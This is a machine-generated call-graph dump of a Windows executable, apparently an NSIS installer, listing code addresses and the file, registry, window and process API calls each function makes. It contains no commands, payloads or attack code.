3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 